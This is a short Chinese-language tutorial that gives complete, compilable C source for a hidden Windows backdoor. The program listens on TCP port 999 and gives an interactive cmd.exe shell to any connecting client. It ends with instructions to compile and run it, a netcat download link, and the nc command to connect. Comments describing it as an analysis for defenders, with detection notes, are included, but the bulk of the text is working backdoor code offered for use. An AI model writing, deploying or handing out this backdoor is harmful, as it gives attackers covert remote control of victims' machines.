1.首先使用vc6编译器编译后门,并运行
#pragma comment(lib,"ws2_32.lib")
#ifdef _MSC_VER
#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"" )
#endif
#include <winsock2.h>
#include <windows.h>
#define Port 999
// Windows bind shell (analysis of the listing above, for defenders).
// Listens on TCP port `Port` on every local interface, accepts one
// client, and starts the COMSPEC command interpreter with the accepted
// socket wired to its stdin/stdout/stderr, so the remote peer drives an
// interactive shell. The process exits once that single session ends.
//
// Detection notes: shows up as an unexpected process owning a listening
// socket on port 999 and a child command interpreter whose three standard
// handles are socket handles rather than console/pipe handles. No return
// value of any API call below is checked, so every failure is silent.
int main()
{
SOCKET sSocket,cSocket;   // sSocket: accepted client; cSocket: listening socket
STARTUPINFO si;
PROCESS_INFORMATION pi;
WSADATA wsaData;
sockaddr_in sSockaddr;
char szCmdPath[MAX_PATH];
// Path of the command interpreter (COMSPEC normally names cmd.exe).
GetEnvironmentVariable("COMSPEC",szCmdPath,MAX_PATH);
ZeroMemory(&wsaData,sizeof(wsaData));
ZeroMemory(&si,sizeof(STARTUPINFO));   // also leaves si.wShowWindow == 0, i.e. SW_HIDE
ZeroMemory(&pi,sizeof(PROCESS_INFORMATION));
WSAStartup(0x0202,&wsaData);   // request Winsock 2.2
cSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
// Bind to all local interfaces on Port.
sSockaddr.sin_addr.s_addr=INADDR_ANY;
sSockaddr.sin_family=AF_INET;
sSockaddr.sin_port=htons(Port);
bind(cSocket,(sockaddr*)&sSockaddr,sizeof(sSockaddr));
listen(cSocket,1);   // backlog of one: exactly one client is served
int sLen=sizeof(sSockaddr);
// Blocks until a peer connects; sSockaddr is overwritten with the peer's address.
sSocket=accept(cSocket,(sockaddr*)&sSockaddr,&sLen);
si.cb=sizeof(si);
// The child gets the socket as all three standard handles; because
// STARTF_USESHOWWINDOW is set and wShowWindow is still 0, its window is hidden.
si.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
si.hStdInput=(HANDLE)sSocket;
si.hStdOutput=(HANDLE)sSocket;
si.hStdError=(HANDLE)sSocket;
// bInheritHandles=TRUE (5th argument) is what lets the socket handles reach the child.
CreateProcess(NULL,szCmdPath,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
WaitForSingleObject(pi.hProcess,INFINITE);   // stay alive until the shell exits
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
closesocket(cSocket);
closesocket(sSocket);
WSACleanup();
return 0;
}
连接时使用nc工具连接即可 下载地址:https://eternallybored.org/misc/netcat/
nc执行命令 nc64.exe -t 192.168.1.12 999 即可连接到主机